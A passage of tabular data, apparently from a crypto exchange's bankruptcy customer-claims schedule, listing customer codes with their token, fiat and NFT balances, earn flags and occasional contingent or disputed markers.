| 07340141 | | BAT[16.75714435], CUSDT[1], GRT[15.11258855], TRX[2], USD[0.00] | | |
| 07340142 | | CUSDT[4.00000472], LINK[.4792334], USD[0.00] | | |
| 07340143 | | USD[10.00] | | |
| 07340144 | | USD[10.52] | | |
| 07340145 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07340146 | | BTC[.00000192], DOGE[0], ETH[0.00000017], ETHW[0.00000017], USD[0.00] | | |
| 07340147 | | USD[10.00] | | |
| 07340148 | | BRZ[1], DOGE[0], ETH[0], USD[59.18] | | |
| 07340149 | | CUSDT[2], USD[101.03], USDT[1] | | |
| 07340150 | | DOGE[.37621346], SHIB[1], TRX[.00045228], USD[0.00] | Yes | |
| 07340151 | | USD[10.00] | | |
| 07340152 | | USD[10.00] | | |
| 07340153 | | CUSDT[2], DOGE[5097.29962798], ETH[.00509729], ETHW[.00509729], USD[0.00] | | |
| 07340154 | | USD[10.90] | Yes | |
| 07340156 | | USD[10.00] | | |
| 07340157 | | CUSDT[2], SHIB[1], SUSHI[19.38738329], TRX[1], USD[0.45] | Yes | |
| 07340159 | | USD[10.00] | | |
| 07340160 | | BRZ[1], LTC[.28579144], TRX[1], USD[0.00] | | |
| 07340161 | | DOGE[14.79705015], MATIC[11.62437277], TRX[1], USD[13.01] | Yes | |
| 07340162 | | USD[11.09] | Yes | |
| 07340163 | | USD[10.00] | | |
| 07340164 | | USD[10.00] | | |
| 07340165 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340166 | | BRZ[1], CUSDT[3], USD[0.01] | | |
| 07340167 | | BRZ[1], GRT[1], SOL[.00089088], TRX[1], USD[0.00] | | |
| 07340168 | | BTC[.00000990], DOGE[0], ETH[0], LTC[0] | | |
| 07340169 | | USD[10.00] | | |
| 07340170 | Contingent, Disputed | USD[0.00] | | |
| 07340172 | | ETH[.00000001], USD[0.00] | | |
| 07340173 | | USD[10.00] | | |
| 07340174 | | KSHIB[14.91507745], USD[0.00], USDT[0] | | |
| 07340175 | | BRZ[1], CUSDT[1], DOGE[0], GRT[1], TRX[.99572612], USD[271.71] | | |
| 07340176 | | CUSDT[1], DOGE[.00001304], USD[0.00] | | |
| 07340177 | | USD[10.00] | | |
| 07340178 | | CUSDT[5], DOGE[58.98081621], ETH[.00439158], ETHW[.00439158], SOL[.2339467], TRX[2], USD[3.17] | | |
| 07340179 | | USD[10.00] | | |
| 07340180 | | USD[10.00] | | |
| 07340181 | | USD[10.00] | | |
| 07340182 | | USD[10.00] | | |
| 07340183 | | USD[10.00] | | |
| 07340184 | | USD[0.00] | | |
| 07340185 | | USD[10.00] | | |
| 07340186 | | BAT[0], BCH[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], SUSHI[0], USD[0.01] | Yes | |
| 07340187 | | DOGE[15876.00221239], ETH[.06450737], ETHW[.06450737], TRX[253.1333204], USD[114.84] | | |
| 07340188 | | USD[10.00] | | |
| 07340189 | | USD[0.12], USDT[0] | Yes | |
| 07340190 | | DOGE[0], USD[0.00] | | |
| 07340191 | | USD[0.00] | Yes | |
| 07340193 | | DOGE[23.997863], USD[0.00] | | |
| 07340194 | | BCH[0], DAI[0], ETH[0], ETHW[0], MATIC[0], SHIB[34.30946256], SOL[0], TRX[.0003261], USD[0.00], USDT[0] | Yes | |
| 07340198 | | USD[10.00] | | |
| 07340199 | | CUSDT[3], USD[0.61] | | |
| 07340200 | | USD[10.00] | | |
| 07340201 | | USD[10.00] | | |
| 07340203 | | USD[0.01] | | |
| 07340204 | | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07340205 | | BTC[.00034141], CUSDT[11], DOGE[1048.67296072], ETH[.00765508], ETHW[.00765508], TRX[2], USD[0.33] | | |
| 07340207 | | USD[10.00] | | |
| 07340208 | | DOGE[1], USD[0.00] | | |
| 07340209 | | BAT[1.01655549], BRZ[1.00071793], BTC[0], CUSDT[5], DOGE[0], ETH[0], ETHW[0], SHIB[0], SOL[.00004414], TRX[3], USD[0.01], USDT[0.00000001] | Yes | |
| 07340210 | | ETH[.00561659], ETHW[.00561659], USD[0.00] | | |
| 07340211 | | USD[10.00] | | |
| 07340212 | | CUSDT[49.48008922], USD[0.97] | | |
| 07340213 | | DOGE[.39342201], USD[0.01] | Yes | |
| 07340214 | | BRZ[4], GRT[9.33777075], SUSHI[0], TRX[3], USD[0.00] | | |
| 07340215 | | USD[10.00] | | |
| 07340216 | | USD[10.00] | | |
| 07340217 | | USD[10.00] | | |
| 07340218 | | AAVE[2.04232276], AVAX[10.31482459], BAT[550.9956505], BTC[.0193685], CUSDT[2], DOGE[10.07361699], ETH[.9006854], ETHW[.56237989], GRT[2007.05566207], LINK[31.43326709], MATIC[646.36508833], SHIB[1340507 3.67874583], SOL[9.97649878], SUSHI[108.06233711], TRX[7], USD[511.77] | Yes | |
| 07340219 | | BRZ[1], BTC[.00005029], DOGE[2], USD[12.47] | | |
| 07340220 | | USD[10.00] | | |
| 07340221 | | BRZ[1], BTC[.000197], DOGE[.0000587], TRX[1], USD[0.01] | | |
| 07340222 | | USD[10.00] | | |
| 07340223 | | USD[10.00] | | |
| 07340224 | | USD[10.00] | | |
| 07340225 | | BRZ[2], CUSDT[18], TRX[0], USD[0.00] | | |
| 07340226 | | BRZ[2], CUSDT[6], DOGE[3148.42032779], SHIB[4375982.36879664], USD[0.00], USDT[0] | Yes | |
| 07340227 | | DOGE[17.88007569], USD[0.04] | Yes | |
| 07340228 | | ETH[.00564735], ETHW[.00564735], USD[0.00] | | |
| 07340229 | | USD[10.00] | | |
| 07340230 | | BTC[.00000884], DOGE[15.84558196], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340231 | | CUSDT[4], DOGE[1], TRX[1], USD[0.94] | | |
| 07340232 | | USD[10.00] | | |
| 07340233 | | USD[10.00] | | |
| 07340234 | | BAT[1.01655549], CUSDT[2], TRX[2], USD[0.01] | Yes | |
| 07340235 | | USD[10.00] | | |
| 07340236 | | BAT[89.35685], DOGE[2412.02667034], GRT[264.12695], KSHIB[1728.3565], LINK[20.265135], MATIC[9.183], SHIB[9191260], SOL[5.6856835], SUSHI[132.984625], TRX[3417.04464285], USD[250.96] | | |
| 07340237 | | USD[10.00] | | |
| 07340238 | | USD[10.00] | | |
| 07340240 | | BAT[0], BTC[0], CUSDT[5], DOGE[2735.85993046], ETH[0], NFT [459178116925753113/Little Rocks #558][1], SHIB[7339644.45075101], SOL[0.31913024], SUSHI[65.81475966], TRX[2427.38103855], USD[0.00], USDT[0.00000001] | Yes | |
| 07340241 | | BCH[.02398564], BRZ[152.13085612], BTC[.00039963], CUSDT[6], DOGE[215.20811561], ETH[.01481349], ETHW[.01463331], SUSHI[1.12520951], USD[6.68] | Yes | |
| 07340242 | | USD[10.00] | | |
| 07340243 | | BAT[.00086206], BRZ[2], BTC[.00114821], CUSDT[15], DOGE[39.70234888], ETHW[1.69831642], GRT[56.10464492], NEAR[.13958779], NFT (42613438894921431 4/Entrance Voucher #1998)[1], SHIB[102], TRX[4], UNI[.00000001], USD[-16.48], USDT[0.00046560] | Yes | |
| 07340244 | | BAT[121.39124384], BRZ[1], CUSDT[7], DOGE[3114.81248908], ETH[.07368475], ETHW[.07368475], SOL[1.05677548], TRX[1293.30380714], USD[0.10] | | |
| 07340245 | | USD[10.00] | | |
| 07340246 | | BTC[.00017568], USD[0.00] | Yes | |
| 07340247 | | USD[10.00] | | |
| 07340248 | | USD[10.00] | | |
| 07340249 | | USD[10.00] | | |
| 07340250 | | BTC[0.00002350], ETH[0], USDT[0] | | |
| 07340251 | | CUSDT[204.20881733], DOGE[1541.75357373], NFT (539497119499229553/Polka Dino 4)[1], SHIB[95633.96127019], TRX[185.33445993], USD[0.00] | | |
| 07340253 | | USD[10.00] | | |
| 07340255 | | CUSDT[3], DOGE[1405.25543821], USD[0.00] | | |
| 07340256 | | USD[0.01] | | |
| 07340257 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07340258 | | USD[10.00] | | |
| 07340259 | | SUSHI[.97494068], USD[0.00] | Yes | |
| 07340262 | | BAT[1], CUSDT[475.43350498], TRX[2], USD[0.01] | | |
| 07340263 | | USD[10.00] | | |
| 07340264 | | USD[0.00] | | |
| 07340266 | | BAT[1.0165555], BRZ[4], BTC[0], CUSDT[6], DOGE[0], ETH[0], GRT[1.00498957], SOL[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07340267 | | USD[10.00] | | |
| 07340268 | | CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07340269 | | BAT[12.08070164], USD[0.00] | | |
| 07340270 | | DOGE[49.33394731], USD[0.00] | | |
| 07340271 | | USD[10.00] | | |
| 07340272 | | USD[10.00] | | |
| 07340273 | | DOGE[1], USD[24.42] | | |
| 07340274 | | BRZ[2], DOGE[.00021855], ETH[2.9472961], ETHW[2.94605823], TRX[1], USD[11.00] | Yes | |
| 07340275 | | USD[10.00] | | |
| 07340276 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07340277 | | USD[10.00] | | |
| 07340278 | | CUSDT[7], DOGE[2], SOL[0.87846458], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07340279 | | BAT[1], USD[0.01] | | |
| 07340281 | | BRZ[2], CUSDT[4], TRX[5], USD[0.83] | | |
| 07340282 | | USD[65.42] | | |
| 07340283 | | BRZ[1], CUSDT[1], SOL[.08091327], USD[-2.43], USDT[9.95103493] | | |
| 07340284 | | BRZ[1], CUSDT[.00067244], DOGE[4.02183096], MATIC[.00051549], SHIB[3], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07340285 | | BTC[.02264196], CUSDT[1], DOGE[62739.8503879], GRT[1.00341568], LTC[2.79933921], TRX[3], USD[0.00], USDT[1.09827052] | Yes | |
| 07340286 | | DOGE[144.72221944], USD[0.00] | | |
| 07340287 | | DOGE[1], USD[0.00] | | |
| 07340288 | | BTC[0.00000166], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07340289 | | USD[10.00] | | |
| 07340290 | | USD[10.00] | | |
| 07340291 | | UNI[13.986], USD[0.12], USDT[0.00000029] | | |
| 07340293 | | CUSDT[1], LTC[.0475763], USD[0.00] | | |
| 07340294 | | CUSDT[2], USD[0.00] | | |
| 07340296 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340297 | | USD[0.00] | | |
| 07340298 | | LTC[.02802331], USD[0.00] | Yes | |
| 07340299 | | BTC[.00016403], DOGE[929.36783007], USD[77.59] | Yes | |
| 07340301 | | USD[10.00] | | |
| 07340302 | | USD[10.00] | | |
| 07340303 | | BTC[.01227870], DOGE[2841.1788217], ETH[.03588863], ETHW[.03544175], USD[0.63] | Yes | |
| 07340304 | | USD[10.00] | | |
| 07340305 | | USD[10.00] | | |
| 07340306 | | USD[10.00] | | |
| 07340308 | | BRZ[1], CUSDT[1], DOGE[3.48092735], ETH[.00001261], ETHW[0.00001261], GRT[1], TRX[1], USD[0.00] | Yes | |
| 07340309 | | USD[10.00] | | |
| 07340310 | | DOGE[28.01728038], USD[0.00] | | |
| 07340311 | | USD[10.00] | | |
| 07340312 | | BTC[.00087497], SHIB[999703.72201602], USD[0.00], USDT[0] | Yes | |
| 07340313 | | USD[0.01] | | |
| 07340314 | | DOGE[2.90725906], USD[0.00] | | |
| 07340315 | | USD[10.00] | | |
| 07340316 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], TRX[3.92853974], USD[0.00] | | |
| 07340318 | | BTC[0], NFT [3192169630692204804/SolMee #6637][1], NFT [3201252967920277856/Party Pixels][1], NFT [3546735166763334995/SolMee #1924][1], NFT [3794008104379001165/SolMee #1504][1], NFT [3798701714675374357/Crypto Vidas #374][1], NFT [3828161736424754428/Ayyo and the Artisans][1], NFT [3839926310686930036/RINGS #19909177041Z][1], NFT [3925685947025351149/SolMee #12488][1], NFT [4133670194054138111/SKULL Staking][1], NFT [4792282365275616653/Skeleton Crew X JT.Art #083][1], NFT [4810379122055512706/Solameleon #7017][1], NFT [4819411789124107580/Sloth #2841][1], NFT [4885307926173019499/Vintage Cartoon SKULL][1], NFT [5101422296980278651/My 461st Birthday Party][1], NFT [5333639771507600403/Artagon OG #552][1], NFT [5614841738713896611/Mary Scott][1], NFT [5653521539603942552/CryptoVeras #1276][1], NFT [5672958575227209996/6 RINGS #198485770053][1], USD[0.01], USDT[0] | | |
| 07340319 | | BAT[4.65106984], BRZ[55.31850975], CUSDT[4572.92172375], DOGE[52.50702895], ETH[0], NFT [3648878019441451723/Entrance Voucher #1822][1], SHIB[187540.67665614], TRX[58.05182973], USD[0.01] | Yes | |
| 07340320 | | DOGE[145.15958575], USD[0.00] | Yes | |
| 07340322 | | USD[10.00] | | |
| 07340323 | | USD[10.00] | | |
| 07340324 | | BAT[68.6478783], CUSDT[2], DOGE[3771.62817023], KSHIB[129.95483761], SHIB[4653786.48991679], TRX[1], USD[0.00] | | |
| 07340325 | | LTC[.05289146], USD[0.00] | | |
| 07340326 | | BAT[1], BRZ[1], GRT[1], TRX[5], USD[0.00], USDT[4.07194496] | Yes | |
| 07340327 | | BAT[1], CUSDT[1], TRX[1], USD[0.63] | | |
| 07340328 | | DOGE[.00004884], USD[0.12] | | |
| 07340329 | | DOGE[.2586552], USD[0.00] | Yes | |
| 07340330 | | CUSDT[6], ETH[.00758483], ETHW[.00758483], SHIB[145672.91375661], USD[0.00], USDT[19.90605683] | | |
| 07340331 | | DOGE[5631.79226564], ETH[.14938845], SHIB[9695242.92910980], USD[0.00] | | |
| 07340332 | | USD[0.06], USDT[0] | | |
| 07340333 | | DOGE[907.57693037], USD[0.00] | Yes | |
| 07340334 | | CUSDT[1], USD[0.00] | | |
| 07340335 | | USD[10.00] | | |
| 07340336 | | CUSDT[1], DOGE[1], TRX[4], USD[0.01] | | |
| 07340337 | | USD[10.00] | | |
| 07340338 | | BAT[2.87612596], BCH[0], CUSDT[5], DOGE[162.37088017], ETH[0], GRT[0], TRX[1], USD[0.00], USDT[0] | | |
| 07340340 | | USD[0.01], USDT[0.00000001] | | |
| 07340341 | | BAT[1], BRZ[2], CUSDT[4], DOGE[52.82294941], TRX[3], USD[0.01], USDT[1] | | |
| 07340342 | | USD[10.00] | | |
| 07340343 | | CUSDT[4], TRX[1], USD[0.01] | | |
| 07340344 | | USD[10.00] | | |
| 07340345 | | BRZ[1], CUSDT[1], USD[0.01] | Yes | |
| 07340346 | | BAT[0], BF_POINT[100], BTC[0], CUSDT[0], DAI[0], DOGE[1596.57090338], ETH[0.05321987], ETHW[0.05256094], GRT[0], NFT [3108187346147206688/SOLYETIS #3866][1], NFT [3553273379288584991/CryptoAvatar #67][1], NFT [3729893203039544468/CryptoAvatar #69][1], NFT [3997641189918347731/CryptoAvatar #56][1], NFT [5611600202286141616/Skull #0002 - BTC][1], SHIB[11880894.05550643], SOL[6.72731983], TRX[0I], USD[0.00], USDT[0] | Yes | |
| 07340348 | | DOGE[20.21741525], USD[0.00] | | |
| 07340349 | | USD[10.00] | | |
| 07340350 | | ETH[.00572449], ETHW[.00572449], USD[0.00] | | |
| 07340351 | | USD[10.00] | | |
| 07340352 | | USD[10.00] | | |
| 07340353 | | TRX[127.52018599], USD[0.87] | | |
| 07340354 | | USD[10.00] | | |
| 07340355 | | USD[10.00] | | |
| 07340356 | | BRZ[2], BTC[.07288496], CUSDT[8], DOGE[10754.84055068], GRT[1], SHIB[7148854.71222796], SOL[5.0314676], TRX[1], USD[0.18] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340357 | | USD[0.00] | | |
| 07340358 | Contingent, Disputed | DOGE[685.13795368], USD[10.00] | | |
| 07340359 | | LTC[0], TRX[1], USD[0.00] | Yes | |
| 07340361 | | BRZ[1], CUSDT[10], DOGE[2], USD[0.00] | | |
| 07340362 | | DOGE[0], TRX[105.54503389], USD[0.01] | | |
| 07340363 | | TRX[187.21497689], USD[0.00] | | |
| 07340364 | | GRT[1], USD[10.59] | Yes | |
| 07340365 | | USD[10.00] | | |
| 07340366 | | USD[64.88] | | |
| 07340368 | | BRZ[1], CUSDT[2], ETH[.00001247], ETHW[.00001247], GRT[1.00498957], LINK[1.57039001], NFT (505659947015570438/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #19)[1], SUSHI[6.3745775], TRX[6], USD[0.00] | Yes | |
| 07340369 | | USD[10.00] | | |
| 07340370 | | USD[10.00] | | |
| 07340371 | | TRX[1], USD[0.00] | | |
| 07340372 | | CUSDT[1.00000036], DOGE[10779.0042966], ETH[.02570957], ETHW[.0253947], USD[0.04] | Yes | |
| 07340373 | | BAT[2], BRZ[1], DOGE[1483.5062422], GRT[2], TRX[4], USD[1733.68] | | |
| 07340375 | | USD[10.00] | | |
| 07340376 | | BAT[156.87386836], BRZ[0], DOGE[863.76800568], ETH[0], GRT[23.65577095], KSHIB[510.71215249], LINK[2.92087413], MATIC[22.55595838], SHIB[553246.41978569], SOL[2.70342807], SUSHI[17.44168858], TRX[212.69964099], USD[3.23] | Yes | |
| 07340377 | | CUSDT[2], LINK[11.65414738], USD[0.00] | Yes | |
| 07340378 | | BAT[4], BRZ[12], CUSDT[50], DOGE[3.93533084], TRX[2.20117745], USD[0.00], USDT[2] | | |
| 07340379 | | CUSDT[4], ETHW[.44419767], SHIB[1], TRX[2], USD[133.09] | | |
| 07340380 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07340381 | | USD[10.00] | | |
| 07340382 | | USD[0.00] | | |
| 07340383 | | USD[10.00] | | |
| 07340384 | | BAT[1], BCH[0], BRZ[4.00000473], CUSDT[18], DOGE[0], ETH[0], ETHW[0], LINK[0], TRX[0], USD[0.00] | | |
| 07340385 | | USD[10.00] | | |
| 07340386 | | GRT[0], USD[0.00] | | |
| 07340387 | | BAT[1], BRZ[1], CUSDT[1], DOGE[2], GRT[3], USD[0.00], USDT[1] | | |
| 07340388 | | USD[10.00] | | |
| 07340389 | | ETH[0], SHIB[1], USD[0.00] | Yes | |
| 07340390 | | CUSDT[2], GRT[.00005126], USD[0.00] | | |
| 07340391 | | ETH[.00359213], ETHW[.00359213], USD[10.00] | | |
| 07340392 | | BRZ[3], DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07340394 | | SHIB[5507.12967875], USD[0.00] | | |
| 07340395 | | CUSDT[1], DOGE[7134.03642359], ETH[.00000083], ETHW[.00000083], USD[0.00] | | |
| 07340396 | | DOGE[669.74132517], USD[10.00] | | |
| 07340397 | | BTC[0], CUSDT[1], ETH[.38541864], ETHW[.38525672], TRX[1330.62803019], USD[0.00] | Yes | |
| 07340398 | | GRT[7.22353275], USD[0.00] | | |
| 07340399 | | LINK[.37450432], USD[0.00] | | |
| 07340400 | | BRZ[1], CUSDT[18], DOGE[16002.95490568], ETH[.2893752], ETHW[1.33828306], LTC[.00005616], SHIB[4], SOL[6.23459562], TRX[5], USD[0.00], USDT[0] | | |
| 07340401 | | CUSDT[2], USD[0.01] | | |
| 07340402 | | USD[10.00] | | |
| 07340403 | | DOGE[0], USD[1.59], USDT[0] | | |
| 07340404 | | USD[10.00] | | |
| 07340405 | | USD[10.91] | Yes | |
| 07340406 | | USD[10.00] | | |
| 07340407 | | USD[0.00] | | |
| 07340408 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07340409 | | USD[0.00] | | |
| 07340410 | | USD[10.00] | | |
| 07340411 | | BTC[0], CUSDT[2], DOGE[0], ETH[0], LTC[0], SHIB[5], SUSHI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07340412 | | CUSDT[1], USD[381.84] | | |
| 07340413 | | USD[10.00] | | |
| 07340415 | | CUSDT[2], DOGE[.00001821], SHIB[16684011.69068120], USD[0.00], USDT[1] | | |
| 07340416 | | CUSDT[8], DOGE[2614.34441947], ETH[.01345186], ETHW[.01345186], TRX[5], USD[0.00] | | |
| 07340417 | | BRZ[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], SOL[0], USD[142.10] | | |
| 07340418 | | DOGE[0], USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340420 | | BRZ[3], BTC[.01833337], CUSDT[25], DOGE[1150.40102088], ETH[.39559052], ETHW[.39542446], LINK[9.60320047], SOL[3.99495699], SUSHI[11.07514938], TRX[4], UNI[19.01672871], USD[0.00] | Yes | |
| 07340421 | | BRZ[1], CUSDT[6], DOGE[1061.12088914], TRX[5], USD[0.00], USDT[3] | | |
| 07340422 | | BTC[.00178207], CUSDT[2], DOGE[.00004306], USD[0.90] | | |
| 07340423 | Contingent, Disputed | DOGE[0], LINK[0], SHIB[0], USD[0.01] | Yes | |
| 07340424 | | BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.01], USDT[0] | Yes | |
| 07340425 | | DOGE[1.17457138], USD[0.70] | | |
| 07340427 | | USD[10.00] | | |
| 07340428 | | DOGE[20765.04389479], TRX[1], USD[10.00] | | |
| 07340429 | | BAT[11.01788826], BRZ[.01123205], CUSDT[2], TRX[141.96833585], USD[0.00] | | |
| 07340430 | | USD[10.00] | | |
| 07340432 | | USD[10.00] | | |
| 07340434 | | DOGE[184.83058428], USD[0.00] | | |
| 07340435 | | USD[10.00] | | |
| 07340436 | | BRZ[2], TRX[1], USD[0.01] | | |
| 07340437 | | USD[10.00] | | |
| 07340439 | | DOGE[1], LINK[.00147271], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07340440 | | USD[10.00] | | |
| 07340441 | | USD[10.00] | | |
| 07340442 | | BTC[.00011438], USD[80.90] | Yes | |
| 07340443 | | USD[10.00] | | |
| 07340444 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07340445 | | USD[10.00] | | |
| 07340446 | | BAT[0], BRZ[1], BTC[.00083664], CUSDT[4], DOGE[8], ETH[0], SOL[0], SUSHI[0], TRX[3], USD[0.00] | | |
| 07340447 | | DOGE[2], USD[0.00] | | |
| 07340448 | | CUSDT[5], DOGE[1099.10743178], TRX[1], USD[0.00] | | |
| 07340449 | | CUSDT[1], ETH[.00338262], ETHW[.00338262], USD[0.00] | | |
| 07340450 | | USD[10.00] | | |
| 07340451 | | BTC[.00927631], DOGE[7126.40256867], USD[0.00] | Yes | |
| 07340452 | | SHIB[.08], USD[0.00] | | |
| 07340453 | | DOGE[1.0000144], USD[0.70] | | |
| 07340454 | | DOGE[2], USD[0.00] | | |
| 07340455 | | USD[10.00] | | |
| 07340456 | | DOGE[15.16886465], USD[0.00] | | |
| 07340457 | | USD[10.00] | | |
| 07340458 | | CUSDT[1], DOGE[18.42212101], USD[0.00] | | |
| 07340460 | | USD[10.00] | | |
| 07340462 | | USD[10.00] | | |
| 07340463 | | USD[10.00] | | |
| 07340465 | | DOGE[1], USD[0.01] | | |
| 07340466 | | DOGE[.92589079], NFT (410015536665784114/Series 1: Wizards #313)[1], NFT (503232957994525542/Series 1: Capitals #357)[1], USD[0.00] | | |
| 07340467 | | DOGE[153.46752377], USD[0.00] | Yes | |
| 07340469 | | USD[10.00] | | |
| 07340470 | | USD[10.00] | | |
| 07340472 | | USD[10.00] | | |
| 07340473 | | TRX[82.4362141], USD[0.00] | Yes | |
| 07340474 | | CUSDT[1], DOGE[198.82599664], SUSHI[54.18256384], USD[0.00] | Yes | |
| 07340476 | | DOGE[833.04278394], USD[0.00] | | |
| 07340478 | | DOGE[209.58150186], USD[0.00] | | |
| 07340479 | | BTC[.00046573], DOGE[1914.44727817], USD[0.25] | Yes | |
| 07340480 | | USD[10.00] | | |
| 07340481 | | DOGE[125.60578098], USD[0.00] | | |
| 07340482 | | USD[10.00] | | |
| 07340484 | | USD[0.01] | | |
| 07340485 | | DOGE[.00784923], LINK[0.00976664], TRX[12], USD[0.00] | | |
| 07340486 | | CUSDT[3], DOGE[411.66647081], KSHIB[197.82834592], SHIB[198622.88135593], USD[0.00] | | |
| 07340487 | | USD[10.00] | | |
| 07340488 | | BAT[0], CUSDT[0], LINK[0], SHIB[74720526.96155619], USD[0.00] | | |
| 07340489 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340490 | | USD[0.00] | | |
| 07340491 | | BAT[.00000888], BRZ[4], BTC[.00000965], CUSDT[14], DOGE[15849.89991055], GRT[1.0346808], LINK[1.10422201], TRX[7.02490877], UNI[1.10423209], USD[0.50], USDT[1.10425225] | Yes | |
| 07340492 | | BRZ[1], CUSDT[1], DOGE[1], LTC[ 33694748], USD[0.00] | | |
| 07340493 | | DAI[4.30781422], DOGE[21.80066839], GRT[2.33951708], USD[0.87], USDT[0.07452248] | Yes | |
| 07340494 | | USD[10.00] | | |
| 07340495 | | USD[10.00] | | |
| 07340497 | | DOGE[278.40698941], USD[0.05] | | |
| 07340498 | | USD[10.00] | | |
| 07340499 | | BRZ[1], CUSDT[8], ETH[.00000001], MATIC[11.4292836], SHIB[29729.51605231], TRX[3], USD[0.00], USDT[0.00000001] | | |
| 07340500 | | USD[0.01] | | |
| 07340501 | | DOGE[1.00001115], USD[0.01] | | |
| 07340502 | | USD[10.00] | | |
| 07340504 | | USD[0.00] | | |
| 07340506 | | SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07340508 | | USD[10.00] | | |
| 07340509 | | USD[10.00] | | |
| 07340510 | | USD[10.00] | | |
| 07340511 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], UNI[0], USD[0.00] | Yes | |
| 07340512 | | DOGE[2], USD[10.00] | | |
| 07340513 | | BCH[.02423003], BTC[.01316149], CUSDT[7], DOGE[112.09500944], ETH[.33873111], ETHW[.33858588], GRT[73.93119545], LINK[13.01619335], SOL[9.64323392], TRX[608.42914976], USD[0.95], USDT[1.10540245] | Yes | |
| 07340514 | | USD[10.00] | | |
| 07340515 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0] | | |
| 07340516 | | CUSDT[11], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07340518 | | USD[10.00] | | |
| 07340519 | | BRZ[1], CUSDT[4], TRX[1], USD[0.00] | | |
| 07340520 | | BRZ[1], DOGE[.59995612], TRX[1], USD[0.00] | | |
| 07340521 | | BTC[0], DOGE[69.69643087], SHIB[1], USD[0.00] | Yes | |
| 07340522 | | BAT[1], BRZ[1], CUSDT[1], GRT[1], USD[0.01], USDT[2.13278793] | Yes | |
| 07340523 | | LTC[0], SUSHI[0], USD[1.34], USDT[0] | | |
| 07340524 | | SHIB[868105.93266129], USD[0.00] | Yes | |
| 07340525 | | BTC[0], CUSDT[1], DOGE[2], LTC[0], USD[0.00] | | |
| 07340526 | | USD[0.01] | | |
| 07340527 | | SOL[.0999], USD[0.67] | | |
| 07340528 | | CUSDT[2], DOGE[819.90249128], USD[0.00] | | |
| 07340529 | | USD[10.00] | | |
| 07340530 | | USD[10.00] | | |
| 07340531 | | USD[10.00] | | |
| 07340532 | | USD[10.00] | | |
| 07340533 | | AAVE[0], BAT[0], BCH[0.00064728], BRZ[51.28822241], BTC[0.00013656], CUSDT[8], DAI[0], DOGE[3.00704369], ETH[0.00674397], ETHW[0.00666189], GRT[1.02773768], LINK[4.49210823], LTC[0.00234006], NEAR[4.55786507], NFT [298824813952605903/Heavenly water#089][1], NFT [300212880462150667/Mad Lions Series #20][1], NFT [327526691016030939/LightPunk #9459][1], NFT [331734341569632970/DOTB #5142][1], NFT [336153183160327585/Heavenly water#088][1], NFT [345503707685438602/DOTB #8332][1], NFT [354391266331565618/One Dino Dollar #2][1], NFT [357994678312220285/DOTB #3593][1], NFT [373684084216813570/Antique Motorcycles #2 of 3][1], NFT [373840253574719756/KuArmy #16][1], NFT [379571135269204953/ Heavenly water#019][1], NFT [394489504701743833/Leader change][1], NFT [405908609671150657/Computer Generated Dino CGD # 8 of 500 ][1], NFT [409136149790473090/DOTB #7712][1], NFT [423633977302124652/Heavenly water#022][1], NFT [424921300948608558/ Heavenly water#044][1], NFT [427827293885967570/DarkPunk #2936][1], NFT [430900698923078413/CryptoFabula #194][1], NFT [431860186818904940/DOTB #6239][1], NFT [438235428547605765/DOTB #6439][1], NFT [439822755831447749/DOTB #8584][1], NFT [445578365190652623/DOTB #3713][1], NFT [452161785550484808/Mad Lions Remastered #28][1], NFT [455932523200111241/It's a girl][1], NFT [458566969584150274/DOTB #366][1], NFT [464386657960809883/Shiba  furious][1], NFT [468478622490130336/CryptoFabula #312][1], NFT [473375050281341580/DOTB #5148][1], NFT [487116963285680898/ Heavenly water#080][1], NFT [487153362795401126/CryptoFabula #296][1], NFT [489300122362316823/CryptoFabula #310][1], NFT [491221246637881990/DOTB #780][1], NFT [499564997199252327/DOTB #8771][1], NFT [507259221851660950/DOTB #1058][1], NFT [525930715522470580/Mad Lions Remastered #36][1], NFT [527664957857853625/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #106][1], 